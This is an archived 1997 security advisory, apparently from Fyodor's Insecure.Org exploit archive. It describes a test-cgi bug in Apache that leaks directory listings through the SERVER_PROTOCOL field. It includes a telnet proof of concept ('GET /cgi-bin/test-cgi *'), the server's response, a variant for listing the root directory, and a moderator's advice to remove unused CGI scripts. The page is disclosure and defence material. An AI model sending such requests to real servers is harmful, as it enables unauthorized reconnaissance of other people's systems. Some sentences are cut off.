If you give test-cgi an argument which includes a *, you can get a directory listing from the SERVER_PROTOCOL field. In other words, it is another pathetic cgi.
Jason Uhlenkott <email@example.com>
remotely obtain directory listings
Systems running Apache/1.2b2, probably earlier versions, many systems that have test-cgi installed.
6 June 1997
Date: Fri, 06 Jun 1997 00:57:32 -0800
From: Jason Uhlenkott <firstname.lastname@example.org>
Subject: [linux-security] Inventory files bug now in SERVER_PROTOCOL
Sorry if this has already been discovered. I just read about the
test-cgi bug in which all files on the system could be inventoried if a
* was put in the QUERY_STRING. I'm running Apache/1.2b11, which has the
QUERY_STRING problem fixed, but the same problem seems to exist in
SERVER_PROTOCOL is normally "HTTP/1.0". But Apache seems to accept
anything there. The following worked on my machine:
Pentium:~$ telnet localhost 80
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test-cgi *
HTTP/1.1 200 OK
Date: Fri, 06 Jun 1997 08:44:18 GMT
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/1.2b11
SERVER_NAME = Pentium.corecom.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = printenv test-cgi
SERVER_PORT = 80
REQUEST_METHOD = GET
SCRIPT_NAME = /cgi-bin/test-cgi
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
Connection closed by foreign host.
Notice the "SERVER_PROTOCOL = printenv test-cgi". These are the two
files in my cgi-bin directory. Other directories can be viewed just as
easily (for instance, "GET /cgi-bin/test-cgi /*" will list the root
I uploaded the test-cgi script from my Apache and reproduced this bug on
a Netscape server. I haven't been able to get Netscape's version of
[mod: This is a bug in the "test-cgi" script. CGI-scripts are very
hard to get right. The apache people just put quotes around the fields
that they could easily change from the remote site. They missed this
one. As always, you probably don't know that "test-cgi" exists, and
you probably don't need it. I recommend that you remove all cgi
scripts that you don't use. -- REW]
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: